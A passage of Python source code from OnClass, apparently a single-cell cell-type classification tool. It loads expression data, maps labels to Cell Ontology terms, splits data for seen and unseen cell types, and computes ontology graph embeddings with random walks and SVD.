models:\n\t\tOnClass.BuildModel(OnClass.co2emb, ngene = ngene, use_pretrain = model)\n\t\tprint ('Build model finished for ',model)\n\t\tpred_Y_seen, pred_Y_all, pred_label = OnClass.Predict(test_X, test_genes = genes)\n\t\tprint ('Predict for ',model)\n\t\tpred_Y_all = pred_Y_all.T / (pred_Y_all.T.sum(axis=1)[:, np.newaxis] + 1)\n\t\tpred_Y_all = pred_Y_all.T\n\t\tif len(last_l2i)>0:\n\t\t\tnew_ct_ind = []\n\t\t\tfor i in range(len(last_i2l)):\n\t\t\t\tl = last_i2l[i]\n\t\t\t\tnew_ct_ind.append(OnClass.co2i[l])\n\t\t\tpred_Y_all = pred_Y_all[:, np.array(new_ct_ind)]\n\t\t\tpred_Y_all_models += pred_Y_all\n\t\telse:\n\t\t\tlast_l2i = OnClass.co2i\n\t\t\tlast_i2l = OnClass.i2co\n\t\t\tpred_Y_all_models = pred_Y_all\n\treturn pred_Y_all_models\n\ndef read_data(feature_file, cell_ontology_ids, exclude_non_leaf_ontology = False, ct_mapping_key = {}, tissue_key = None, seed = 1, filter_key = None, AnnData_label_key=None, nlp_mapping = True, nlp_mapping_cutoff = 0.8, co2emb = None, label_file=None, cl_obo_file = None, cell_ontology_file = None, memory_saving_mode = False, backup_file='sparse_featurefile_backup'):\n\t\"\"\"\n\tRead data from the given feature file, and processes it so that it fits with the other\n\tgiven paramters as needed.\n\tParameters\n\t----------\n\tfeature_file: `string`\n\t\tname of file to extract data from. The data in the file must be stored in h5ad file format.\n\tcell_ontology_ids: `set`\n\t\tset of ids from the cell ontology.\n\tAnnData_label_key: `numpy.ndarray`, optional (None)\n\t\tmapping of the cell type classes to reindex the labels in the AnnData object\n\tco2emb: `map`, optional (None)\n\t\tmaps cell-type from the cell ontology to its embedding\n\tlabel_file: `string`, optional (None)\n\t\tfile from which to get the labels of the feature file\n\tmemory_saving_mode: `bool`, optional (False)\n\t\twhether the method should be run under tight RAM constraints.\n\tbackup_file: `string`, optional ('sparse_featurefile_backup')\n\t\tthe name of the file to copy the sparse feature dataset to.\n\n\tReturns\n\t-------\n\tdataset: `numpy.ndarray` or `scipy.sparse.csr_matrix` (depends on mode)\n\t\tgene expression matrix of cell types for the test set\n\tgenes: `list`\n\t\tlist of genes in the dataset\n\tlabels: `numpy.ndarray`\n\t\tlabels from the feature file\n\tx: AnnData object stored in the given feature file\n\t\"\"\"\n\t\n\tnp.random.seed(seed)\n\t\n\tif memory_saving_mode:\t\n\t\tx = read_h5ad(feature_file, backed='r+')\n\t\tdataset = x.X.to_memory() # Gets a sparse array in csr matrix form\n\telse:\n\t\tx = read_h5ad(feature_file)\n\t\tdataset = x.X.toarray()\n\n\t# if memory_saving_mode:\n\t# print_memory_usage(\"while reading data\")\n\n\tncell = np.shape(x.X)[0]\n\tgenes = np.array([x.upper() for x in x.var.index])\n\n\tif tissue_key is not None:\n\t\ttissues = np.array(x.obs[tissue_key].tolist())\n\telse:\n\t\ttissues = None\n\tif AnnData_label_key is None and label_file is None:\n\t\tprint ('no label file is provided')\n\t\tlabels = None\n\t\tdataset, labels, tissues, x = select_cells_based_on_keys(x, dataset, labels = labels, tissues = tissues, filter_key = filter_key)\n\t\treturn dataset, genes, labels, tissues, x\n\tif AnnData_label_key is not None:\n\t\tlabels = x.obs[AnnData_label_key].tolist()\n\telse:\n\t\tfin = open(label_file)\n\t\tlabels = []\n\t\tfor line in fin:\n\t\t\tlabels.append(line.strip())\n\t\tfin.close()\n\tlabels = np.array(labels)\n\tdataset, labels, tissues, x = select_cells_based_on_keys(x, dataset, labels = labels, tissues = 
tissues, filter_key = filter_key)\n\n\tif memory_saving_mode:\n\t\tx = x.copy(filename=backup_file)\n\n\tind, labels, unfound_labs = map_and_select_labels(labels, cell_ontology_ids, cl_obo_file, ct_mapping_key = ct_mapping_key, nlp_mapping = nlp_mapping, co2emb = co2emb, nlp_mapping_cutoff = nlp_mapping_cutoff, cl_obo_file = cl_obo_file)\n\tif tissue_key is not None:\n\t\ttissues = tissues[ind]\n\tdataset = dataset[ind, :]\n\n\tif memory_saving_mode:\n\t\t# Need to copy to disk for rewriting to the sparse dataset\n\t\tx = x[ind, :].copy(filename=backup_file)\n\telse:\n\t\tx = x[ind, :]\n\n\tif exclude_non_leaf_ontology:\n\t\tnew_ids, exclude_terms = exclude_parent_child_nodes(cell_ontology_file, labels)\n\t\tif tissues is not None:\n\t\t\ttissues = tissues[new_ids]\n\t\tdataset = dataset[new_ids, :]\n\t\tlabels = labels[new_ids]\n\t\tx = x[new_ids, :]\n\n\tncell = np.shape(dataset)[0]\n\tindex = np.random.choice(ncell,ncell,replace=False)\n\tdataset = dataset[index, :] # cell by gene matrix\n\tlabels = labels[index]\n\tif tissue_key is not None:\n\t\ttissues = tissues[index]\n\treturn dataset, genes, labels, tissues, x\n\n\ndef exact_match_co_name_2_co_id(labels, lab2co, cl_obo_file = None):\n\tif cl_obo_file is None:\n\t\treturn lab2co\n\tco2name, name2co = get_ontology_name(obo_file = cl_obo_file)\n\tfor label in labels:\n\t\tif label.lower() in name2co:\n\t\t\tlab2co[label.lower()] = name2co[label.lower()]\n\tfor name in name2co:\n\t\tlab2co[name.lower()] = name2co[name]\n\treturn lab2co\n\n\ndef map_and_select_labels(labels, cell_ontology_ids, obo_file, ct_mapping_key = {}, nlp_mapping = True, nlp_mapping_cutoff = 0.8, co2emb = None, cl_obo_file = None):\n\tlab2co = {}\n\tif nlp_mapping:\n\t\tif co2emb is None:\n\t\t\tsys.exit('Please provide cell type embedding to do NLP-based mapping.')\n\t\tlab2co = fine_nearest_co_using_nlp(np.unique(labels), co2emb, obo_file,nlp_mapping_cutoff = nlp_mapping_cutoff)\n\tlab2co = exact_match_co_name_2_co_id(np.unique(labels), lab2co, cl_obo_file = cl_obo_file)\n\tfor ct in ct_mapping_key:\n\t\tlab2co[ct_mapping_key[ct]] = lab2co[ct]\n\tind = []\n\tlab_id = []\n\tunfound_labs = set()\n\tfor i,l in enumerate(labels):\n\t\tif l in cell_ontology_ids:\n\t\t\tind.append(i)\n\t\t\tlab_id.append(l)\n\t\telif l.lower() in lab2co:\n\t\t\tind.append(i)\n\t\t\tlab_id.append(lab2co[l.lower()])\n\t\telse:\n\t\t\tunfound_labs.add(l)\n\tfrac = len(ind) * 1. / len(labels)\n\tind = np.array(ind)\n\tlabels = np.array(lab_id)\n\tunfound_labs = set(unfound_labs)\n\twarn_message = 'Warning: only %f percent of labels are in the Cell Ontology. The remaining cells are excluded! 
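A hypothetical call to read_data; the file names and the co2emb mapping are placeholders that must exist beforehand (co2emb can come from cal_ontology_emb). Note that filter_key should be passed as an empty dict here, since select_cells_based_on_keys iterates over it and would fail on the None default:

dataset, genes, labels, tissues, adata = read_data(
    'tabula_muris.h5ad',                  # hypothetical h5ad feature file
    cell_ontology_ids,                    # set of 'CL:xxxxxxx' term ids
    filter_key={},
    AnnData_label_key='cell_ontology_class',
    co2emb=co2emb,                        # cell-type embeddings for NLP mapping
    cl_obo_file='cl.obo',
    cell_ontology_file='cl.ontology')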
Consider using NLP mapping and choose a small mapping cutoff (nlp_mapping_cutoff)' % (frac * 100)\n\tif frac < 0.5:\n\t\tprint (warn_message)\n\t\tprint ('Here are unfound labels:',unfound_labs)\n\treturn ind, labels, unfound_labs\n\ndef parse_h5ad(file,seed=1,nsample=1e10,label_key='cell_ontology_class', read_tissue = False, batch_key = '', filter_key={}, cell_ontology_file = None, exclude_non_leaf_ontology = True, exclude_non_ontology=True, cl_obo_file = None):\n\t'''\n\tread h5ad file\n\tfeature: cell by gene expression\n\tlabel: cell ontology class\n\tgenes: gene names HGNC\n\t'''\n\tnp.random.seed(seed)\n\tx = read_h5ad(file)\n\tncell = np.shape(x.X)[0]\n\tselect_cells = set(range(ncell))\n\tfor key in filter_key:\n\t\tvalue = filter_key[key]\n\t\tselect_cells = select_cells & set(np.where(np.array(x.obs[key])==value)[0])\n\tselect_cells = sorted(select_cells)\n\tfeature = x.X[select_cells, :]\n\tlabels = np.array(x.obs[label_key].tolist())[select_cells]\n\tif read_tissue:\n\t\ttissues = np.array(x.obs['tissue'].tolist())[select_cells]\n\tif batch_key=='' or batch_key not in x.obs.keys():\n\t\tbatch_labels = np.ones(len(labels))\n\telse:\n\t\tbatch_labels = np.array(x.obs[batch_key].tolist())[select_cells]\n\tgenes = x.var.index\n\tncell = len(select_cells)\n\n\tif exclude_non_ontology:\n\t\tnew_ids, labels = exclude_non_ontology_term(cl_obo_file, labels, label_key)\n\t\tfeature = feature[new_ids, :]\n\t\tbatch_labels = batch_labels[new_ids]\n\tif exclude_non_leaf_ontology:\n\t\tnew_ids, exclude_terms = exclude_parent_child_nodes(cell_ontology_file, labels)\n\t\t#print (len(exclude_terms),'non leaf terms are excluded')\n\t\tfeature = feature[new_ids, :]\n\t\tbatch_labels = batch_labels[new_ids]\n\t\tlabels = labels[new_ids]\n\t\tif read_tissue:\n\t\t\ttissues = tissues[new_ids]\n\tncell = len(labels)\n\tindex = np.random.choice(ncell,min(nsample,ncell),replace=False)\n\tbatch_labels = batch_labels[index]\n\tfeature = feature[index, :] # cell by gene matrix\n\tlabels = labels[index]\n\tif read_tissue:\n\t\ttissues = tissues[index]\n\tgenes = x.var.index\n\t#corrected_feature = run_scanorama_same_genes(feature, batch_labels)\n\tcorrected_feature = feature.toarray()\n\tgenes = [x.upper() for x in genes]\n\tgenes = np.array(genes)\n\tif read_tissue:\n\t\tassert(len(tissues) == len(labels))\n\t\treturn corrected_feature, labels, genes, tissues\n\telse:\n\t\treturn corrected_feature, labels, genes\n\n\ndef exclude_parent_child_nodes(cell_ontology_file,labels):\n\tuniq_labels = np.unique(labels)\n\texcludes = set()\n\tnet = collections.defaultdict(dict)\n\tfin = open(cell_ontology_file)\n\tfor line in fin:\n\t\ts,p = line.strip().split('\\t')\n\t\tnet[s][p] = 1 #p is parent\n\tfin.close()\n\tfor n in list(net.keys()):\n\t\tngh = get_ontology_parents(net, n)\n\t\tfor n1 in ngh:\n\t\t\tnet[n][n1] = 1\n\tfor l1 in uniq_labels:\n\t\tfor l2 in uniq_labels:\n\t\t\tif l1 in net[l2] and l1!=l2: #l1 is l2 parent\n\t\t\t\texcludes.add(l1)\n\t#print (excludes)\n\tnew_ids = []\n\tfor i in range(len(labels)):\n\t\tif labels[i] not in excludes:\n\t\t\tnew_ids.append(i)\n\tnew_ids = np.array(new_ids)\n\treturn new_ids, excludes\n\n\ndef corr2_coeff(A, B):\n # Rowwise mean of input arrays & subtract from input arrays themeselves\n A_mA = A - A.mean(1)[:, None]\n B_mB = B - B.mean(1)[:, None]\n\n # Sum of squares across rows\n ssA = (A_mA**2).sum(1)\n ssB = (B_mB**2).sum(1)\n\n # Finally get corr coeff\n return np.dot(A_mA, B_mB.T) / np.sqrt(np.dot(ssA[:, None],ssB[None]))\n\n\ndef 
extract_data_based_on_class(feats, labels, sel_labels):\n\tind = []\n\tfor l in sel_labels:\n\t\tid = np.where(labels == l)[0]\n\t\tind.extend(id)\n\tnp.random.shuffle(ind)\n\tX = feats[ind,:]\n\tY = labels[ind]\n\treturn X, Y, ind\n\n\ndef SplitTrainTest(all_X, all_Y, all_tissues = None, random_state=10, nfold_cls = 0.3, nfold_sample = 0.2, nmin_size=10, memory_saving_mode=False):\n\t\"\"\"\n\tUtility function for splitting the dataset into a train and test set.\n\tParameters\n\t----------\n\tall_X: all the feature data\n\tall_Y: the corresponding labels\n\n\tReturns\n\t-------\n\tThe labeled training and test sets\n\t\"\"\"\n\tnp.random.seed(random_state)\n\n\tcls = np.unique(all_Y)\n\tcls2ct = Counter(all_Y)\n\tncls = len(cls)\n\ttest_cls = list(np.random.choice(cls, int(ncls * nfold_cls), replace=False))\n\tfor c in cls2ct:\n\t\tif cls2ct[c] < nmin_size:\n\t\t\ttest_cls.append(c)\n\ttest_cls = np.unique(test_cls)\n\t#add rare class to test, since they cannot be split into train and test by using train_test_split(stratify=True)\n\ttrain_cls = [x for x in cls if x not in test_cls]\n\ttrain_cls = np.array(train_cls)\n\ttrain_X, train_Y, train_ind = extract_data_based_on_class(all_X, all_Y, train_cls)\n\ttest_X, test_Y, test_ind = extract_data_based_on_class(all_X, all_Y, test_cls)\n\tif all_tissues is not None:\n\t\ttrain_tissues = all_tissues[train_ind]\n\t\ttest_tissues = all_tissues[test_ind]\n\t\ttrain_X_train, train_X_test, train_Y_train, train_Y_test, train_tissues_train, train_tissues_test = train_test_split(\n\t \ttrain_X, train_Y, train_tissues, test_size=nfold_sample, stratify = train_Y,random_state=random_state)\n\t\ttest_tissues = np.concatenate((test_tissues, train_tissues_test))\n\t\ttrain_tissues = train_tissues_train\n\telse:\n\t\ttrain_X_train, train_X_test, train_Y_train, train_Y_test = train_test_split(\n\t \ttrain_X, train_Y, test_size=nfold_sample, stratify = train_Y,random_state=random_state)\n\t\n\t# TODO: Added this memory saving mode toggle\n\tif memory_saving_mode:\n\t\ttest_X = scipy.sparse.vstack((test_X, train_X_test))\n\telse:\n\t\ttest_X = np.vstack((test_X, train_X_test))\n\t\n\ttest_Y = np.concatenate((test_Y, train_Y_test))\n\ttrain_X = train_X_train\n\ttrain_Y = train_Y_train\n\tif all_tissues is not None:\n\t\treturn train_X, train_Y, train_tissues, test_X, test_Y, test_tissues\n\telse:\n\t\treturn train_X, train_Y, test_X, test_Y\n\n\ndef LeaveOneOutTrainTest(all_X, all_Y, test_Y, all_tissues = None, random_state=10, nfold_sample = 0.2, nmin_size=10):\n\tnp.random.seed(random_state)\n\n\tcls = np.unique(all_Y)\n\tcls2ct = Counter(all_Y)\n\tncls = len(cls)\n\ttest_cls = [test_Y]\n\ttest_cls = np.unique(test_cls)\n\t#add rare class to test, since they cannot be split into train and test by using train_test_split(stratify=True)\n\ttrain_cls = [x for x in cls if x not in test_cls]\n\ttrain_cls = np.array(train_cls)\n\ttrain_X, train_Y, train_ind = extract_data_based_on_class(all_X, all_Y, train_cls)\n\ttest_X, test_Y, test_ind = extract_data_based_on_class(all_X, all_Y, test_cls)\n\tif all_tissues is not None:\n\t\ttrain_tissues = all_tissues[train_ind]\n\t\ttest_tissues = all_tissues[test_ind]\n\t\ttrain_X_train, train_X_test, train_Y_train, train_Y_test, train_tissues_train, train_tissues_test = train_test_split(\n\t \ttrain_X, train_Y, train_tissues, test_size=nfold_sample, stratify = train_Y,random_state=random_state)\n\t\ttest_tissues = np.concatenate((test_tissues, train_tissues_test))\n\t\ttrain_tissues = 
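A small usage sketch for SplitTrainTest on synthetic data; with ten classes and the default nfold_cls=0.3, three cell types are held out of training entirely, which is how the unseen-class evaluation is set up:

import numpy as np

rng = np.random.default_rng(1)
X = rng.normal(size=(600, 20))
Y = rng.choice(['CL:%07d' % i for i in range(10)], size=600)
train_X, train_Y, test_X, test_Y = SplitTrainTest(X, Y)
unseen = set(np.unique(test_Y)) - set(np.unique(train_Y))
print(len(unseen), 'cell types appear only in the test set')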
train_tissues_train\n\telse:\n\t\ttrain_X_train, train_X_test, train_Y_train, train_Y_test = train_test_split(\n\t \ttrain_X, train_Y, test_size=nfold_sample, stratify = train_Y,random_state=random_state)\n\ttest_X = np.vstack((test_X, train_X_test))\n\ttest_Y = np.concatenate((test_Y, train_Y_test))\n\ttrain_X = train_X_train\n\ttrain_Y = train_Y_train\n\tif all_tissues is not None:\n\t\treturn train_X, train_Y, train_tissues, test_X, test_Y, test_tissues\n\telse:\n\t\treturn train_X, train_Y, test_X, test_Y\n\ndef renorm(X):\n\tY = X.copy()\n\tY = Y.astype(float)\n\tngene,nsample = Y.shape\n\ts = np.sum(Y, axis=0)\n\t#print s.shape()\n\tfor i in range(nsample):\n\t\tif s[i]==0:\n\t\t\ts[i] = 1\n\t\t\tif i < ngene:\n\t\t\t\tY[i,i] = 1\n\t\t\telse:\n\t\t\t\tfor j in range(ngene):\n\t\t\t\t\tY[j,i] = 1. / ngene\n\t\tY[:,i] = Y[:,i]/s[i]\n\treturn Y\n\ndef RandomWalkRestart(A, rst_prob, delta = 1e-4, reset=None, max_iter=50,use_torch=False,return_torch=False):\n\tif use_torch:\n\t\tdevice = torch.device(\"cuda:0\")\n\tnnode = A.shape[0]\n\t#print nnode\n\tif reset is None:\n\t\treset = np.eye(nnode)\n\tnsample,nnode = reset.shape\n\t#print nsample,nnode\n\tP = renorm(A)\n\tP = P.T\n\tnorm_reset = renorm(reset.T)\n\tnorm_reset = norm_reset.T\n\tif use_torch:\n\t\tnorm_reset = torch.from_numpy(norm_reset).float().to(device)\n\t\tP = torch.from_numpy(P).float().to(device)\n\tQ = norm_reset\n\n\tfor i in range(1,max_iter):\n\t\t#Q = gnp.garray(Q)\n\t\t#P = gnp.garray(P)\n\t\tif use_torch:\n\t\t\tQ_new = rst_prob*norm_reset + (1-rst_prob) * torch.mm(Q, P)#.as_numpy_array()\n\t\t\tdelta = torch.norm(Q-Q_new, 2)\n\t\telse:\n\t\t\tQ_new = rst_prob*norm_reset + (1-rst_prob) * np.dot(Q, P)#.as_numpy_array()\n\t\t\tdelta = np.linalg.norm(Q-Q_new, 'fro')\n\t\tQ = Q_new\n\t\t#print (i,Q)\n\t\tsys.stdout.flush()\n\t\tif delta < 1e-4:\n\t\t\tbreak\n\tif use_torch and not return_torch:\n\t\tQ = Q.cpu().numpy()\n\treturn Q\n\ndef DCA_vector(Q, dim):\n\tnnode = Q.shape[0]\n\talpha = 1. 
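RandomWalkRestart iterates Q <- rst*R + (1-rst)*Q P (P is the column-normalised adjacency, transposed) until the Frobenius change drops below 1e-4, so on a small graph it should agree with the closed form Q = rst*(I - (1-rst)P)^{-1}. A sketch using numpy only; note the use_torch branch additionally needs an `import torch` that this module does not perform:

import numpy as np

A = np.array([[0., 1., 0.],
              [1., 0., 1.],
              [0., 1., 0.]])
rst = 0.5
Q = RandomWalkRestart(A, rst)
P = renorm(A).T                          # row-stochastic transition matrix
closed = rst * np.linalg.inv(np.eye(3) - (1 - rst) * P)
assert np.allclose(Q, closed, atol=1e-3)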
/ (nnode **2)\n\tQ = np.log(Q + alpha) - np.log(alpha);\n\n\t#Q = Q * Q';\n\t[U, S, V] = svds(Q, dim);\n\tS = np.diag(S)\n\tX = np.dot(U, np.sqrt(S))\n\tY = np.dot(np.sqrt(S), V)\n\tY = np.transpose(Y)\n\treturn X,U,S,V,Y\n\ndef read_cell_ontology_nlp(l2i, ontology_nlp_file, ontology_nlp_emb_file):\n\tncls = len(l2i)\n\tnet = np.zeros((ncls, ncls))\n\tbin_net = np.zeros((ncls, ncls))\n\tfin = open(ontology_nlp_file)\n\tfor line in fin:\n\t\ts,p,wt = line.upper().strip().split('\\t')\n\t\twt = float(wt)\n\t\tnet[l2i[s], l2i[p]] = np.exp(wt)\n\t\tnet[l2i[p], l2i[s]] = np.exp(wt)\n\t\tbin_net[l2i[s], l2i[p]] = 1\n\t\tbin_net[l2i[p], l2i[s]] = 1\n\tfin.close()\n\n\tl2vec = {}\n\tfin = open(ontology_nlp_emb_file)\n\tfor line in fin:\n\t\tw = line.upper().strip().split('\\t')\n\t\tl2vec[w[0]] = []\n\t\tdim = len(w)-1\n\t\tfor i in range(1,len(w)):\n\t\t\tl2vec[w[0]].append(float(w[i]))\n\tfin.close()\n\n\tl2vec_mat = np.zeros((ncls, dim))\n\tfor l in l2vec:\n\t\tif l.upper() not in l2i:\n\t\t\tcontinue\n\t\tl2vec_mat[l2i[l.upper()],:] = l2vec[l]\n\n\t'''\n\tnet_sum = np.sum(net,axis=0)\n\tfor i in range(ncls):\n\t\tif net_sum[i] == 0:\n\t\t\tnet[i,i] = 1.\n\t\tnet[:,i] /= np.sum(net[:,i])\n\t#net = net / net.sum(axis=1)[:, np.newaxis]\n\t'''\n\treturn net, bin_net, l2vec_mat\n\n\ndef GetReverseNet(onto_net):\n\tonto_net_rev = collections.defaultdict(dict)\n\tfor a in onto_net:\n\t\tfor b in onto_net[a]:\n\t\t\tonto_net_rev[b][a] = 1\n\treturn onto_net_rev\n\n\ndef ParseCLOnto(train_Y, ontology_nlp_file, ontology_file, co_dim=5, co_mi=3, dfs_depth = 1, combine_unseen = False, add_emb_diagonal = True, use_pretrain = None, use_seen_only = True):#\n\tunseen_l, l2i, i2l, train_X2Y, onto_net, onto_net_mat = create_labels(train_Y, ontology_nlp_file, ontology_file, dfs_depth = dfs_depth, combine_unseen = combine_unseen)\n\tY_emb = emb_ontology(i2l, ontology_nlp_file, ontology_file, dim = co_dim, mi=co_mi, use_pretrain = use_pretrain, use_seen_only = True, unseen_l = unseen_l)\n\tif add_emb_diagonal:\n\t\tY_emb = np.column_stack((np.eye(len(i2l)), Y_emb))\n\treturn unseen_l, l2i, i2l, onto_net, Y_emb, onto_net_mat\n\n\n\ndef graph_embedding(A, i2l, mi=0, dim=20,use_seen_only=True,unseen_l=None):\n\tnl = np.shape(A)[0]\n\tif use_seen_only:\n\t\tseen_ind = []\n\t\tunseen_ind = []\n\t\tfor i in range(nl):\n\t\t\tif i2l[i] in unseen_l:\n\t\t\t\tunseen_ind.append(i)\n\t\t\telse:\n\t\t\t\tseen_ind.append(i)\n\t\tseen_ind = np.array(seen_ind)\n\t\tunseen_ind = np.array(unseen_ind)\n\n\t#if len(seen_ind) * 0.8 < dim:\n\t#\tdim = int(len(seen_ind) * 0.8)\n\tif mi==0 or mi == 1:\n\t\tsp = graph_shortest_path(A,method='FW',directed =False)\n\telse:\n\t\tsp = RandomWalkRestart(A, 0.8)\n\tif use_seen_only:\n\t\tsp = sp[seen_ind, :]\n\t\tsp = sp[:,seen_ind]\n\tX = np.zeros((np.shape(sp)[0],dim))\n\tsvd_dim = min(dim, np.shape(sp)[0]-1)\n\tif mi==0 or mi == 2:\n\t\tX[:,:svd_dim] = svd_emb(sp, dim=svd_dim)\n\telse:\n\t\tX[:,:svd_dim] = DCA_vector(sp, dim=svd_dim)[0]\n\tif use_seen_only:\n\t\tX_ret = np.zeros((nl, dim))\n\t\tX_ret[seen_ind,:] = X\n\telse:\n\t\tX_ret = X\n\tif mi==2 or mi == 3:\n\t\tsp *= -1\n\treturn sp, X_ret\n\ndef cal_ontology_emb(ontology_nlp_file, ontology_file, dim=20, mi=3, use_pretrain = None, use_seen_only = True, unseen_l = None):\n\tif use_pretrain is None or not os.path.isfile(use_pretrain+'X.npy') or not os.path.isfile(use_pretrain+'sp.npy'):\n\t\tcl_nlp = collections.defaultdict(dict)\n\t\tif ontology_nlp_file is not None:\n\t\t\tfin = open(ontology_nlp_file)\n\t\t\tfor line in 
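DCA_vector factorises log((Q + alpha)/alpha) with a truncated SVD, returning X = U*sqrt(S) and Y = (sqrt(S)*V)^T, so X @ Y.T reconstructs that log-matrix up to rank-dim error; a quick numeric check on a toy random-walk matrix:

import numpy as np

Q = RandomWalkRestart(np.eye(4) + np.ones((4, 4)), 0.5)
X, U, S, V, Y = DCA_vector(Q, dim=3)
alpha = 1. / Q.shape[0] ** 2
target = np.log(Q + alpha) - np.log(alpha)
print(np.linalg.norm(X @ Y.T - target))   # small rank-3 residual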
fin:\n\t\t\t\ts,p,wt = line.upper().strip().split('\\t')\n\t\t\t\tcl_nlp[s][p] = float(wt)\n\t\t\t\tcl_nlp[p][s] = float(wt)\n\t\t\tfin.close()\n\n\t\tfin = open(ontology_file)\n\t\tlset = set()\n\t\ts2p = {}\n\t\tfor line in fin:\n\t\t\tw = line.strip().split('\\t')\n\t\t\ts = w[0]\n\t\t\tp = w[1]\n\t\t\tif len(w)==2:\n\t\t\t\tif p in cl_nlp and s in cl_nlp[p]:\n\t\t\t\t\twt = cl_nlp[p][s]\n\t\t\t\telse:\n\t\t\t\t\twt = 1.\n\t\t\telse:\n\t\t\t\twt = float(w[2])\n\t\t\tif s not in s2p:\n\t\t\t\ts2p[s] = {}\n\t\t\ts2p[s][p] = wt\n\t\t\tlset.add(s)\n\t\t\tlset.add(p)\n\t\tfin.close()\n\t\tlset = np.sort(list(lset))\n\t\tnl = len(lset)\n\t\tl2i = dict(zip(lset, range(nl)))\n\t\ti2l = dict(zip(range(nl), lset))\n\t\tA = np.zeros((nl, nl))\n\t\tfor s in s2p:\n\t\t\tfor p in s2p[s]:\n\t\t\t\tA[l2i[s], l2i[p]] = s2p[s][p]\n\t\t\t\tA[l2i[p], l2i[s]] = s2p[s][p]\n\t\tsp, X = graph_embedding(A, i2l, mi=mi, dim=dim, use_seen_only=use_seen_only, unseen_l=unseen_l)\n\t\tif use_pretrain is not None:\n\t\t\ti2l_file = use_pretrain+'i2l.npy'\n\t\t\tl2i_file = use_pretrain+'l2i.npy'\n\t\t\tX_file = use_pretrain+'X.npy'\n\t\t\tsp_file = use_pretrain+'sp.npy'\n\t\t\tnp.save(X_file, X)\n\t\t\tnp.save(i2l_file, i2l)\n\t\t\tnp.save(l2i_file, l2i)\n\t\t\tnp.save(sp_file, sp)\n\telse:\n\t\ti2l_file = use_pretrain+'i2l.npy'\n\t\tl2i_file = use_pretrain+'l2i.npy'\n\t\tX_file = use_pretrain+'X.npy'\n\t\tsp_file = use_pretrain+'sp.npy'\n\t\tX = np.load(X_file)\n\t\ti2l = np.load(i2l_file,allow_pickle=True).item()\n\t\tl2i = np.load(l2i_file,allow_pickle=True).item()\n\t\tsp = np.load(sp_file,allow_pickle=True)\n\treturn X, l2i, i2l, sp\n\ndef merge_26_datasets(datanames_26datasets, scan_dim = 50):\n\tdatasets, genes_list, n_cells = load_names(datanames_26datasets,verbose=False,log1p=True)\n\tdatasets, genes = merge_datasets(datasets, genes_list)\n\tdatasets_dimred, genes = process_data(datasets, genes, dimred=scan_dim)\n\tdatasets_dimred, expr_datasets = my_assemble(datasets_dimred, ds_names=datanames_26datasets, expr_datasets = datasets, sigma=150)\n\tdatasets_dimred = sparse.vstack(expr_datasets).toarray()\n\treturn datasets_dimred, genes\n\ndef emb_ontology(i2l, ontology_nlp_file, ontology_file, dim=20, mi=0, use_pretrain = None, use_seen_only = True, unseen_l = None):\n\tX, ont_l2i, ont_i2l, A = cal_ontology_emb( ontology_nlp_file, ontology_file, dim=dim, mi=mi, use_pretrain = use_pretrain, use_seen_only = True, unseen_l = unseen_l)\n\n\ti2emb = np.zeros((len(i2l),dim))\n\tnl = len(i2l)\n\tfor i in range(nl):\n\t\tant = i2l[i]\n\t\tif ant not in ont_l2i:\n\t\t\tprint (ant, ont_l2i)\n\t\t\tassert('xxx' in ant.lower() or 'nan' in ant.lower())\n\t\t\tcontinue\n\t\ti2emb[i,:] = X[ont_l2i[ant],:]\n\t'''\n\tAA = np.zeros((nl, nl))\n\tfor i in range(nl):\n\t\tfor j in range(nl):\n\t\t\tanti, antj = i2l[i], i2l[j]\n\t\t\tif anti in ont_l2i and antj in ont_l2i:\n\t\t\t\tAA[i,j] = A[ont_l2i[anti],ont_l2i[antj]]\n\t'''\n\treturn i2emb\n\ndef get_ontology_parents(GO_net, g, dfs_depth=100):\n\tterm_valid = set()\n\tngh_GO = set()\n\tngh_GO.add(g)\n\tdepth = {}\n\tdepth[g] = 0\n\twhile len(ngh_GO) > 0:\n\t\tfor GO in list(ngh_GO):\n\t\t\tfor GO1 in GO_net[GO]:\n\t\t\t\tngh_GO.add(GO1)\n\t\t\t\tdepth[GO1] = depth[GO] + 1\n\t\t\tngh_GO.remove(GO)\n\t\t\tif depth[GO] < dfs_depth:\n\t\t\t\tterm_valid.add(GO)\n\treturn term_valid\n\ndef create_labels(train_Y, ontology_nlp_file, ontology_file, combine_unseen = False, dfs_depth = 1000):\n\n\tfin = open(ontology_file)\n\tlset = set()\n\tfor line in fin:\n\t\ts,p = 
line.strip().split('\\t')\n\t\tlset.add(s)\n\t\tlset.add(p)\n\tfin.close()\n\n\tseen_l = sorted(np.unique(train_Y))\n\tunseen_l = sorted(lset - set(train_Y))\n\tys = np.concatenate((seen_l, unseen_l))\n\n\ti2l = {}\n\tl2i = {}\n\tfor l in ys:\n\t\tnl = len(i2l)\n\t\tcol = l\n\t\tif combine_unseen and l in unseen_l:\n\t\t\tnl = len(seen_l)\n\t\t\tl2i[col] = nl\n\t\t\ti2l[nl] = col\n\t\t\tcontinue\n\t\tl2i[col] = nl\n\t\ti2l[nl] = col\n\ttrain_Y = [l2i[y] for y in train_Y]\n\ttrain_X2Y = ConvertLabels(train_Y, ncls = len(i2l))\n\tonto_net, onto_net_mat = read_ontology(l2i, ontology_nlp_file, ontology_file, dfs_depth = dfs_depth)\n\treturn unseen_l, l2i, i2l, train_X2Y, onto_net, onto_net_mat\n\ndef query_depth_ontology(net, node, root='cl:0000000'):\n\tdepth = 0\n\twhile node != root:\n\t\tif len(net[node]) == 0:\n\t\t\tprint (node)\n\t\tnode = sorted(list(net[node].keys()))[0]\n\t\tdepth += 1\n\t\tif depth>100:\n\t\t\tsys.exit('root not found')\n\treturn depth\n\n\ndef read_ontology(l2i, ontology_nlp_file, ontology_file, dfs_depth = 1000):\n\tnl = len(l2i)\n\tnet = collections.defaultdict(dict)\n\tnet_mat = np.zeros((nl,nl))\n\tfin = open(ontology_file)\n\tfor line in fin:\n\t\ts,p = line.strip().split('\\t')\n\t\tsi = l2i[s]\n\t\tpi = l2i[p]\n\t\tnet[si][pi] = 1\n\t\tnet_mat[si][pi] = 1\n\tfin.close()\n\tfor n in range(nl):\n\t\tngh = get_ontology_parents(net, n, dfs_depth = dfs_depth)\n\t\tnet[n][n] = 1\n\t\tfor n1 in ngh:\n\t\t\tnet[n][n1] = 1\n\treturn net, net_mat\n\ndef extract_label_propagate_tree(onto_net, ncls):\n\ttree = np.zeros((ncls,ncls))\n\tfor n1 in onto_net:\n\t\tfor n2 in onto_net[n1]:\n\t\t\ttree[n1,n2] = 1\n\treturn tree\n\ndef ConvertLabels(labels, ncls=-1):\n\tncell = np.shape(labels)[0]\n\tif len(np.shape(labels)) ==1 